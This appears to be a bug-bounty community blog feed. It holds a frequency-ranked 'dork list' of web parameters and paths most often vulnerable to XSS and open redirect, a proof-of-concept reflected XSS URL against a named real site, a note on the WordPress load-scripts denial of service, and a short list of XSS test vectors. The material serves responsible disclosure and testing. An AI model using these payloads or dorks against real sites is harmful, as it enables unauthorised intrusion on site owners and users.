Happy bug hunting in 2020, letβs make Web secure with Open Bug Bounty!
Posted on
Top 100 XSS dorks
Posted on
It’s the end of the year and a good time to share things with people.
After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.
It can be used as a powerful dork list so let’s update your scanners and get bounties!
First here is the list of most vulnerable parameters along with their frequency.
| Dork | Frequency |
|---|---|
| q | 5.5% |
| s | 4.5% |
| search | 1.9% |
| id | 1.7% |
| lang | 1.4% |
| keyword | 1.2% |
| query | 1.1% |
| page | 1.0% |
| keywords | 0.8% |
| year | 0.8% |
| view | 0.8% |
| 0.8% | |
| type | 0.7% |
| name | 0.7% |
| p | 0.7% |
| month | 0.6% |
| immagine | 0.6% |
| list_type | 0.5% |
| url | 0.5% |
| terms | 0.5% |
| categoryid | 0.5% |
| key | 0.5% |
| l | 0.5% |
| begindate | 0.4% |
| enddate | 0.4% |
| categoryid2 | 0.4% |
| t | 0.4% |
| cat | 0.4% |
| category | 0.4% |
| action | 0.4% |
| bukva | 0.4% |
| redirect_uri | 0.4% |
| firstname | 0.4% |
| c | 0.4% |
| lastname | 0.3% |
| uid | 0.3% |
| startTime | 0.3% |
| eventSearch | 0.3% |
| categoryids2 | 0.3% |
| categoryids | 0.3% |
| sort | 0.3% |
| positiontitle | 0.3% |
| groupid | 0.3% |
| m | 0.3% |
| message | 0.3% |
| tag | 0.3% |
| pn | 0.3% |
| title | 0.3% |
| orgId | 0.3% |
| text | 0.3% |
| handler | 0.2% |
| myord | 0.2% |
| myshownums | 0.2% |
| id_site | 0.2% |
| city | 0.2% |
| search_query | 0.2% |
| msg | 0.2% |
| sortby | 0.2% |
| produkti_po_cena | 0.2% |
| produkti_po_ime | 0.2% |
| mode | 0.2% |
| CODE | 0.2% |
| location | 0.2% |
| v | 0.2% |
| order | 0.2% |
| n | 0.2% |
| term | 0.2% |
| start | 0.2% |
| k | 0.2% |
| redirect | 0.2% |
| ref | 0.2% |
| file | 0.2% |
| mebel_id | 0.2% |
| country | 0.2% |
| from | 0.1% |
| r | 0.1% |
| f | 0.1% |
| field%5B%5D | 0.1% |
| searchScope | 0.1% |
| state | 0.1% |
| phone | 0.1% |
| Itemid | 0.1% |
| lng | 0.1% |
| place | 0.1% |
| bedrooms | 0.1% |
| expand | 0.1% |
| e | 0.1% |
| price | 0.1% |
| d | 0.1% |
| path | 0.1% |
| address | 0.1% |
| day | 0.1% |
| display | 0.1% |
| a | 0.1% |
| error | 0.1% |
| form | 0.1% |
| language | 0.1% |
| mls | 0.1% |
| kw | 0.1% |
| u | 0.1% |
This second list is almost the same but with corresponding path :
| Dork | Frequency |
|---|---|
| /?s= | 3.6 |
| /search?q= | 2.5 |
| /index.php?lang= | 0.6 |
| /pplay/info_prenotazioni.asp?immagine= | 0.6 |
| /shared/lgflsearch.php?terms= | 0.5 |
| /index.php?page= | 0.4 |
| /search?query= | 0.4 |
| /en/Telefon-Cam?search= | 0.4 |
| /index.php?bukva= | 0.4 |
| /pro/events_print_setup.cfm?list_type= | 0.3 |
| /pro/events_print_setup.cfm?categoryid= | 0.3 |
| /pro/events_print_setup.cfm?categoryid2= | 0.3 |
| /?eventSearch= | 0.3 |
| /?startTime= | 0.3 |
| /pro/events_ical.cfm?categoryids= | 0.3 |
| /pro/events_ical.cfm?categoryids2= | 0.3 |
| /pro/events_print_setup.cfm?month= | 0.3 |
| /pro/events_print_setup.cfm?year= | 0.3 |
| /pro/events_print_setup.cfm?begindate= | 0.3 |
| /pro/events_print_setup.cfm?enddate= | 0.3 |
| /search?keyword= | 0.3 |
| /?q= | 0.3 |
| /search/?q= | 0.3 |
| /index.php?pn= | 0.3 |
| /?lang= | 0.3 |
| /property/search?uid= | 0.3 |
| /index.php?id= | 0.3 |
| /search?orgId= | 0.3 |
| /products?handler= | 0.2 |
| /pro/events_print_setup.cfm?view= | 0.2 |
| /pro/events_print_setup.cfm?keywords= | 0.2 |
| /?p= | 0.2 |
| /search.php?q= | 0.2 |
| /?search= | 0.2 |
| /pro/minicalendar_detail.cfm?list_type= | 0.2 |
| /index.php?produkti_po_cena= | 0.2 |
| /index.php?produkti_po_ime= | 0.2 |
| /servlet/com.jsbsoft.jtf.core.SG?CODE= | 0.2 |
| /login?redirect_uri= | 0.2 |
| /connexion?redirect_uri= | 0.2 |
| /index.php?action= | 0.2 |
| /plugins/actu/listing_actus-front.php?id_site= | 0.2 |
| /index.php?mebel_id= | 0.2 |
| /search/?search= | 0.2 |
| /news/class/index.php?myshownums= | 0.2 |
| /news/class/index.php?myord= | 0.2 |
| /search.html?searchScope= | 0.1 |
| /search?field%5B%5D= | 0.1 |
| /videos?tag= | 0.1 |
| /videos?place= | 0.1 |
| /videos?search= | 0.1 |
| /?email= | 0.1 |
| /?cat= | 0.1 |
| /content.php?expand= | 0.1 |
| /?page= | 0.1 |
| /search/?s= | 0.1 |
| /?keywords= | 0.1 |
| /search/?keyword= | 0.1 |
| /apps/email/index.jsp?n= | 0.1 |
| /?name= | 0.1 |
| /?sort= | 0.1 |
| /search?search= | 0.1 |
| /pro/minicalendar_print_setup.cfm?begindate= | 0.1 |
| /pro/minicalendar_print_setup.cfm?enddate= | 0.1 |
| /pro/minicalendar_print_setup.cfm?keywords= | 0.1 |
| /search-results?q= | 0.1 |
| /?listingtypeid= | 0.1 |
| /search?s= | 0.1 |
| /pro/minicalendar_print_setup.cfm?categoryid2= | 0.1 |
| /?bathrooms= | 0.1 |
| /?listingagent= | 0.1 |
| /?featuredsearchseourl= | 0.1 |
| /?squarefeet= | 0.1 |
| /?siteid= | 0.1 |
| /?bedrooms= | 0.1 |
| /?featuredsearch= | 0.1 |
| /?price= | 0.1 |
| /?maxbuilt= | 0.1 |
| /?lsid= | 0.1 |
| /?listingtypes= | 0.1 |
| /?garages= | 0.1 |
| /?maxprice= | 0.1 |
| /?minprice= | 0.1 |
| /?keywordsany= | 0.1 |
| /?yearbuilt= | 0.1 |
| /?minbuilt= | 0.1 |
| /?subdivision= | 0.1 |
| /?lotsizeval= | 0.1 |
| /?listingstatusid= | 0.1 |
| /?mls= | 0.1 |
| /firms/?text= | 0.1 |
| /servlet/com.jsbsoft.jtf.core.SG?OBJET= | 0.1 |
| /plan_du_site.php?lang= | 0.1 |
| /index.php?Itemid= | 0.1 |
| /?view= | 0.1 |
| /?t= | 0.1 |
| /?selat= | 0.1 |
| /?selong= | 0.1 |
| /?nwlat= | 0.1 |
| /?geo= | 0.1 |
I hope you enjoy this π
Congrats on 1000 badges OBB
Posted on
Wanted to start my blogg by celebrating 1000 combined honor badges by OBB community! π
hip hip horray!
Awesome job made by the community, if only the site owners could take submitted findings more seriously! Personally I find that a lot of alerted siteowners just seem to throw the information provided in their garbage, and it makes me sad.
Good luck next year everyone! may the hunt be bountiful!
-m00n
Reflected xss in 360totalsecurity
Posted on
i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com
Steps to reproduce :
Go to https://blog.360totalsecurity.com
and replace utm_source value by this XSS payload : xβ><svG onLoad=prompt(document.domain)>
Line: <a href=βhttps://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>
Poc:
https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>
Regards,
TAHA
blind xss in apple
Posted on
This is my report about blind xss in apple via user agent
Denial of Service vulnerability in script-loader.php (CVE-2018-6389)
Posted on
The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested
What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.
I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.
So I tried it, I sent the request to the server:
The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.
Stored XSS
Posted on
I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.
The “S” in IOT is for Security
Posted on
Best XSS Vectors
Posted on
Here’s a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on: – URL query, fragment & path; – all input fields.
From BruteLogic Twitter account : https://twitter.com/brutelogic
#Security 100%
Posted on
